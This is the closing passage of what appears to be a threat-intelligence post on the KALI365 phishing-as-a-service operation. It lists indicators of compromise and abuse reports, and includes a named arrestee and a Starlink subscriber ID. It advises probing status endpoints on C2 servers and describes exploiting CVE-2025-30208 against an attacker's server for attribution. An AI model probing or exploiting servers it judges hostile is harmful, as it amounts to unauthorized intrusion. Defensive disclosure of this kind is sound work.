Unauthenticated /health endpoints are high-value intelligence sources. 8,561+ live victim sessions counted with zero authentication. An open metrics endpoint proves active harm at scale, identifies database technology, CPU state, and worker health. Always probe /health, /status, /metrics, /actuator, /api/info, and /api/health on every C2 server.
The PhaaS market refilled in 60 days. KALI365 launched February 2026 - two months after Okitipi Samuel's arrest. Criminal PhaaS infrastructure is elastic. Takedowns create temporary vacuums, not permanent solutions. Sustained ecosystem disruption requires simultaneous coordination: law enforcement, registrars, hosting providers, CDN platforms, certificate authorities, and crypto payment processors - all at once, not sequentially.
IOC Summary
Operator infrastructure IPs (origin servers):
167.172.199.98, 134.209.55.33, 24.199.108.217, 157.230.53.233, 162.243.166.119, 159.223.147.230, 167.99.0.116, 146.190.33.201, 172.86.72.83
Cloudflare CDN IPs (origin masked):
172.67.140.80 (loadingdocuments.uk), 104.21.0.217 (duemineral.uk)
Operator SSH egress: 135.129.124.63 (Starlink, Lagos Nigeria, NetHandle NET-135-129-124-0-1)
Operator domains: duemineral.uk, loadingdocuments.uk, antired.uk, sharedocpdf.work, pdfdrive.work, clicksideas.com, deculvers.com, creaee.online, dpcusginmein.online
OxaPay merchant: 11153123
Shared TLS fingerprint: SHA1: 15af977ce25de452b96affa2addb1036 (ties 4 IPs)
SSH host keys:
- Active server:
ED25519 AAAAC3NzaC1lZDI1NTE5AAAAINJMAlX1j4UZvY9wsx5YAnEnim3qJOWFhYHUbGsSdHqd - Old server:
ED25519 AAAAC3NzaC1lZDI1NTE5AAAAIOYSIjJR1YnyRtyP+lt0imVvoW5qIUdiYONWzDG+11LZ
Customer domain NameSilo/DNSOWL pattern: ns1.dnsowl.com, ns2.dnsowl.com - consistent across all 20+ NameSilo-registered customer domains
Full infrastructure map, complete IOC list, and abuse report targets available on request.
Abuse reports filed: DigitalOcean (all 8 IPs), RouterHosting/Cloudzy (172.86.72.83), Cloudflare (all operator domains + Workers accounts), Nominet (all 3 .uk domains - validation failure), Wild West Domains (deculvers.com), Namecheap (creaee.online, dpcusginmein.online, clicksideas.com), NameSilo (all customer domains), OxaPay (merchant 11153123), SpaceX Starlink (subscriber 863719539772915747, NetHandle NET-135-129-124-0-1), Microsoft MSTIC (device code phishing IOCs), ZeroSSL (cert issued to panel.duemineral.uk), Let's Encrypt (cert issued to panel.antired.uk).
DISCLAIMER: This investigation was conducted on behalf of a corporate client who received the phishing attack described in this post. The scope of active investigation was limited to infrastructure directly used in the attack against our client. CVE-2025-30208 was demonstrated against the attacker's server solely to identify the operator's management IP address as part of attributing the attack on our client - no data was exfiltrated, modified, or weaponized, and findings were reported immediately to the relevant abuse contacts and law enforcement channels. All unauthenticated endpoints referenced were accessed in their public capacity, equivalent to standard HTTP requests. OSINT collection was performed entirely via passive and open sources (WHOIS, certificate transparency logs, public DNS, internet-wide banner scanning platform data, publicly served web resources, sandbox analysis reports, and public threat intelligence feeds). This post is published as a threat intelligence disclosure in the public interest to assist defenders and inform takedown efforts.
#ThreatHunting #KALI365 #PhishingAsAService #AiTM #DeviceCodePhishing #Nigeria #Starlink #OSINT #ThreatIntelligence #CyberSecurity #DFIR #IncidentResponse #InfoSec #MicrosoftSecurity #IdentityTheft #CloudSecurity #PhishingAwareness #BEC